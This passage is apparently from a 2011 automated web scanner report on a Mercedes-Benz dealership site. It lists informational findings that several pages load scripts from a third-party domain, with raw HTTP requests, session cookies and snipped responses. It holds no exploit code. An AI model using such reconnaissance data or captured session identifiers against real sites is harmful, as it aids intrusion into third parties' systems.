<link rel="shortcut icon" type="image/vnd.microsoft.icon" href="http://static.dealer.com/v8/global/images/site-favicon-default.ico?1190664535000" />
           
   <script type="text/javascript" src="http://static.dealer.com/v8/global/js/ddc-common.js?1296844757000"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://static.dealer.com/v8/global/js/misc/google-analytics.pack.js?1273851376000"></script>
...[SNIP]...

5.3. http://www.theautomastermercedesbenz.com/financing/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /financing/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /financing/index.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=5f439ee10a0a002f005f07e8e85727f2; JSESSIONID=cywj1cs5gwvm; ddcpoolid=CmsPoolO; __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; __utma=124194511.1620789493.1302973377.1302973377.1302973377.1; __utmc=124194511; __utmb=124194511.5.6.1302973388995

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:02:53 GMT
Connection: close
Content-Length: 29281

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz finance department in Shelburne VT</title>
   <meta http-equiv="Content-Type"
...[SNIP]...
<link rel="shortcut icon" type="image/vnd.microsoft.icon" href="http://static.dealer.com/v8/global/images/site-favicon-default.ico?1190664535000" />
           
   <script type="text/javascript" src="http://static.dealer.com/v8/global/js/ddc-common.js?1296844757000"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://static.dealer.com/v8/global/js/jquery/new-forms/forms.core.js?1295908004000"></script>


<script type="text/javascript" src="http://static.dealer.com/v8/global/js/misc/google-analytics.pack.js?1273851376000"></script>
...[SNIP]...

5.4. http://www.theautomastermercedesbenz.com/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://theautomaster.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:02:39 GMT
Connection: close
Set-Cookie: ssoid=5f43a30f0a0a002f005f07e8eb6904d2;path=/
Set-Cookie: JSESSIONID=wk3u7l498ldc;path=/
Set-Cookie: ddcpoolid=CmsPoolO;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 86689

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
<link rel="shortcut icon" type="image/vnd.microsoft.icon" href="http://static.dealer.com/v8/global/images/site-favicon-default.ico?1190664535000" />
           
   <script type="text/javascript" src="http://static.dealer.com/v8/global/js/ddc-common.js?1296844757000"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://static.dealer.com/v8/global/js/jquery/jquery.jcarousel.mod.pack.js?1277737457000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/widgets/generic/content/js/htmlcontent-style2-consolidation.js?1270484703000"></script>


<script type="text/javascript" src="http://static.dealer.com/v8/global/js/misc/google-analytics.pack.js?1273851376000"></script>
...[SNIP]...

5.5. http://www.theautomastermercedesbenz.com/linkout/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /linkout/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /linkout/index.htm?url=http://www.dealer.com HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973377.1; __utmc=124194511; __utmb=124194511.26.9.1302973849681

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:10:33 GMT
Connection: close
Content-Length: 18048

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
<link rel="shortcut icon" type="image/vnd.microsoft.icon" href="http://static.dealer.com/v8/global/images/site-favicon-default.ico?1190664535000" />
           
   <script type="text/javascript" src="http://static.dealer.com/v8/global/js/ddc-common.js?1296844757000"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://static.dealer.com/v8/global/js/misc/google-analytics.pack.js?1273851376000"></script>
...[SNIP]...

5.6. http://www.theautomastermercedesbenz.com/new-inventory/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /new-inventory/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /new-inventory/index.htm?reset=InventoryListing HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/financing/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=5f439ee10a0a002f005f07e8e85727f2; JSESSIONID=cywj1cs5gwvm; ddcpoolid=CmsPoolO; __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; __utma=124194511.1620789493.1302973377.1302973377.1302973377.1; __utmc=124194511; __utmb=124194511.10.3.1302973397616

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:03:03 GMT
Connection: close
Cache-Control: no-store
Content-Length: 119393

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes dealer Mercedes Benz located in Shelburne VT</title>
   <meta http-equiv="Content-
...[SNIP]...
<link rel="shortcut icon" type="image/vnd.microsoft.icon" href="http://static.dealer.com/v8/global/images/site-favicon-default.ico?1190664535000" />
           
   <script type="text/javascript" src="http://static.dealer.com/v8/global/js/ddc-common.js?1296844757000"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://static.dealer.com/v8/widgets/automotive/inventory/listings/v4/js/listings.pack.js?1289418376000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/thickbox/thickbox-3.1-mod.pack.js?1253129070000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/json2.js?1215466905000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/jquery/jquery.cookie.js?1211942223000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/jquery/jquery.eventdelegation.js?1213232061000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/jquery/jquery.ondemand.pack.js?1266538091000"></script>


<script type="text/javascript" src="http://static.dealer.com/v8/global/js/misc/google-analytics.pack.js?1273851376000"></script>
...[SNIP]...

5.7. http://www.theautomastermercedesbenz.com/specials/finance.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /specials/finance.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /specials/finance.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/used-inventory/index.htm?SByear=clear&SBmake=Mercedes-Benz&SBmodel=clear&SBbodystyle=clear&SBprice=clear
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973629.1302976747.3; __utmc=124194511; __utmb=124194511.3.7.1302979441461

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 18:43:47 GMT
Connection: close
Content-Length: 24728

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Specials on new and used cars, trucks, vans, SUVs, parts and service specials.</title>
   <
...[SNIP]...
<link rel="shortcut icon" type="image/vnd.microsoft.icon" href="http://static.dealer.com/v8/global/images/site-favicon-default.ico?1190664535000" />
           
   <script type="text/javascript" src="http://static.dealer.com/v8/global/js/ddc-common.js?1296844757000"></script>
...[SNIP]...
<div class="unit u2">
       <script type="text/javascript" src="http://static.dealer.com/v8/global/js/misc/sbapp.js?1225248066000"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://static.dealer.com/sb/js/ie6-img-resize.js?1196882370000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/imaging/imagecontrol.js?1172164944000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/widgets/automotive/specials/js/printViewWidget.js?1233784274000"></script>


<script type="text/javascript" src="http://static.dealer.com/v8/global/js/misc/google-analytics.pack.js?1273851376000"></script>
...[SNIP]...

5.8. http://www.theautomastermercedesbenz.com/used-inventory/index.htm  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /used-inventory/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /used-inventory/index.htm?reset=InventoryListing HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/dealership/about.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.16.6.1302976719011

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:58:29 GMT
Connection: close
Cache-Control: no-store
Content-Length: 141588

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Used Inventory for Mercedes Benz in Shelburne VT 05482 that includes used cars trucks and
...[SNIP]...
<link rel="shortcut icon" type="image/vnd.microsoft.icon" href="http://static.dealer.com/v8/global/images/site-favicon-default.ico?1190664535000" />
           
   <script type="text/javascript" src="http://static.dealer.com/v8/global/js/ddc-common.js?1296844757000"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://static.dealer.com/v8/widgets/automotive/inventory/listings/v4/js/listings.pack.js?1289418376000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/thickbox/thickbox-3.1-mod.pack.js?1253129070000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/json2.js?1215466905000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/jquery/jquery.cookie.js?1211942223000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/jquery/jquery.eventdelegation.js?1213232061000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/jquery/jquery.ondemand.pack.js?1266538091000"></script>


<script type="text/javascript" src="http://static.dealer.com/v8/global/js/misc/google-analytics.pack.js?1273851376000"></script>
...[SNIP]...

Report generated by XSS.CX at Sun Apr 17 09:18:33 CDT 2011.